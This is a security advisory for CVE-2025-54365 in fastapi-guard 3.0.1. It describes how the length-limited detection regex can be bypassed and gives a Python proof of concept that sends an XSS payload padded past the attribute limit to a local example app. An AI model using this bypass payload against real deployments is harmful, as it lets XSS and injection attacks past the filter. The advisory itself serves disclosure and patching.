logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-54365 fastapi-guard

Package

Manager: pip
Name: fastapi-guard
Vulnerable Version: =3.0.1 || >=3.0.1 <3.0.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:P

EPSS: 0.00103 pctl0.28844

Details

FastAPI Guard has a regex bypass ### Summary The regular expression patched to mitigate the ReDoS vulnerability by limiting the length of string fails to catch inputs that exceed this limit. ### Details In version 3.0.1, you can find a commit like the one in the link below, which was made to prevent ReDoS. https://github.com/rennf93/fastapi-guard/commit/d9d50e8130b7b434cdc1b001b8cfd03a06729f7f This commit mitigates the vulnerability by limiting the length of the input string, as shown in the example below. `r"<script[^>]*>[^<]*<\\/script\\s*>"` -> `<script[^>]{0,100}>[^<]{0,1000}<\\/script\\s{0,10}>` This type of patch fails to catch cases where the string representing the attributes of a <script> tag exceeds 100 characters. Therefore, most of the regex patterns present in version 3.0.1 can be bypassed. ### PoC 1. clone the fastapi-guard repository 2. Navigate to the examples directory and modify the main.py source code. Change the HTTP method for the root route from GET to POST. <img width="1013" height="554" alt="image" src="https://github.com/user-attachments/assets/cf93ea37-2fd7-4251-abb6-b55f88685f54" /> 3. After that, set up the example app environment by running the docker-compose up command. Then, run the Python code below to verify that the two requests return different results. ```python import requests URL = "<http://localhost:8000>" obvious_payload = { "obvious" : "<script>alert(1);</script>" } response = requests.post(url=URL, json=obvious_payload) print(f"[+] response of first request: {response.text}") bypassed_payload = { "suspicious" : f'<script id="i_can_bypass_regex_filtering{'a'*100}">alert(1)</script>' } response = requests.post(url=URL, json=bypassed_payload) print(f"[+] response of second request: {response.text}") ``` <img width="836" height="112" alt="image" src="https://github.com/user-attachments/assets/11dcccb2-6179-44b1-9628-ae0a787e3bb7" /> ### Impact Due to this vulnerability, most of the regex patterns can potentially be bypassed, making the application vulnerable to attacks such as XSS and SQL Injection.

Metadata

Created: 2025-07-23T15:31:12Z
Modified: 2025-07-24T12:46:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json
CWE IDs: ["CWE-185", "CWE-20"]
Alternative ID: GHSA-rrf6-pxg8-684g
Finding: F211
Auto approve: 1